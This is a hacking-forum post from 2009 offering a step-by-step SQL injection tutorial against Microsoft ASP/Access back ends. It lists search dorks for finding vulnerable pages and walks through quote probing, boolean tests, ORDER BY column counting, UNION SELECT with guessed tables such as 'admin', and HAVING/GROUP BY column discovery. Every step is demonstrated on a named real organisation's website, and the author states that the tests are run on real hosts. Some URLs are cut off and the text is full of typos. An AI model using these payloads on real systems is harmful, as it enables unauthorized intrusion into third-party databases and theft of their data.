MSSQL [TUTORIAL]

MSSQL [TUTORIAL]

04-26-2009, 03:07 PM Post: #1

W4rlOCk  (3|2+!|=!3|): 614(|<#4+ Posts: 604 Joined: Feb 2009 Reputation: 0

MSSQL injection guide I did'nt find any good MSSQL injection guide, so idecided to write what i know so far about MSSQLi, ... tests will be the tests on real hosts ... so lets start! Step 1: ------ Good dork: site:.org inurl:.asp?id= site:.com inrul:.aspx?= site:.co.uk inurl:.asp?cid= Or you can figure out your own dork. Step 2: ------- Lets say we found this http://www.expo-centre.ae we will crawl around it until we get to this http://www.expo-centre.ae/en/pressread.asp?id=563 We should see normal page is on. i will to put single quote and see what we could come up with, the resultant URL is http://www.expo-centre.ae/en/pressread.asp?id=563' Now you should see and error like this, Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=563' ;'. /en/includes/configdb.asp, line 23 the error msg on the second like says that we have great chance to inject here, so we proceed with the 1+and+1 test, http://www.expo-centre.ae/en/pressread.a...3+AND+1=1# NOTE: ---- In asp we will use the # for commenting the rest of the query instead of -- or /* . If you got an error says type mismatch like Cint or string something, we can figure out that the input is being checked for data type. if you insising you should find a site that accepts both int and chat in the input. Now we are going to use AND+1=0# http://www.expo-centre.ae/en/pressread.a...3+AND+1=0# if you got incomplete page on or such and error on, ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. /en/pressread.asp, line 44 Now we need to find the column number, for that we will use ORDER BY command Again :) Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize '10' as a valid field name or expressi on. /en/includes/configdb.asp, line 23 that error like our MySQL error Unknow Column '10'. we will keep on decreasing untill we are on the correct number. for out example that should be ... 7 :) http://www.expo-centre.ae/en/pressread.a...3,4,5,6,7# at this point you should see another error, Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table or query. /en/includes/configdb.asp, line 23 the query will not execute. because the query needs an existing table to successfully execute, we will keep guessing until we get existing table, otherwise we will get this error: Microsoft OLE DB Provider for ODBC Drivers error '80040e37' [Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query 'dmin'. Make sure it exists and that its name is spelled correctly. /en/includes/configdb.asp, line 23 that error means the table used does not exist, possible tables that works most of the time are; user users admin login news sysobjects customers .... Our example will be happy with table admin and .... http://www.expo-centre.ae/en/pressread.a...rom+admin# you should still seeing error ignore it and look up besides the 'PRESS RELEASES >' you should see number 4 at this point i think you guys can find out about columns names ...etc. Step 3: ------ You can find the columns names by using HAVEING BY, for example HAVING 1=1 -- GROUP BY table.columnfromerror1 HAVING 1=1 -- GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 -- GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and on and on ... THAT WILL BE ALL... I HOPE THE PAPER WAS HELPING! :)